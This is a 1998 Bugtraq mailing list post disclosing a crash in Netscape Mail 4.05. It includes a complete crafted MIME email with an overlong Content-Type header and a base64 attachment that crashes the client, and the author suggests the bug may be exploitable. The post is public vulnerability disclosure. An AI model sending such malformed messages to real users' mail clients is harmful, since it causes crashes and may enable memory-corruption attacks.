Bugtraq mailing list archives

netscape mail overflow(another one)

From: paul () BOEHM ORG (Paul Boehm)
Date: Tue, 28 Jul 1998 20:21:41 +0200


Hi,
netscape mail crashes when trying to the attachment
from the following pseudo mime mail:

From: Paul Boehm <paul () boehm org>
To: paul () boehm org
Subject: test
Mime-Version: 1.0
Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
--ABC123
Content-Type: text/plain; charset=us-ascii

test123

--ABC123
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AA"

H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
AADwvx2CTC7aACgAAA==

--ABC--

i suppose this is exploitable, but i don't really know.
i only tested this with win95 netscape 4.05.

bye,
    paul

--

[ Paul S. Boehm | paul () boehm priv at | http://paul.boehm.org/ | infected@irc ]

Money is what gives a programmer his resources. It's an exchange system created
by human beings. It surrounds us. Works for us, binds the economy together.

Current thread:

Re: Fwd: Any user can panic OpenBSD machine Jason Thorpe (Jul 27)
- <Possible follow-ups>
- Re: Fwd: Any user can panic OpenBSD machine Michael Graff (Jul 27)
  - Re: Fwd: Any user can panic OpenBSD machine Todd C. Miller (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine Warner Losh (Jul 27)
    - Re: Fwd: Any user can panic OpenBSD machine J.R. Valverde (Jul 28)
    - Re: Fwd: Any user can panic OpenBSD machine Felix Schroeter (Jul 28)
    - netscape mail overflow(another one) Paul Boehm (Jul 28)
    - Re: netscape mail overflow(another one) Brett Glass (Jul 28)
    - Re: netscape mail overflow(another one) pedward () WEBCOM COM (Jul 29)
    - HP-UX Predictive & Netscape SSL Vulnerabilities Aleph One (Jul 29)
    - Long attachment filename exploits: a procmail filter John D. Hardin (Jul 29)
    - Crash a redhat 5.1 linux box Zachary Amsden (Jul 29)
    - FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux box) Joe Zbiciak (Jul 29)
    - Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Roger Espel Llima (Jul 30)
    - Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Alan Cox (Jul 30)
    - Re: FD's 0..2 and suid/sgid procs (Was: Crash a redhat 5.1 linux Pavel Kankovsky (Jul 30)
    - Re: netscape mail overflow(another one) Paul Boehm (Jul 29)

(Thread continues...)